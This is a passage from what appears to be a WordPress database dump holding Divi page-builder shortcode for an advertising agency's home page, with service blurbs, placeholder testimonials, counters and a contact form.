icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-06 21:06:50','2020-08-06 21:06:50','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/06/134-revision-v1/',0,'revision','',0),(452,1,'2020-08-06 21:10:37','2020-08-06 21:10:37','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" 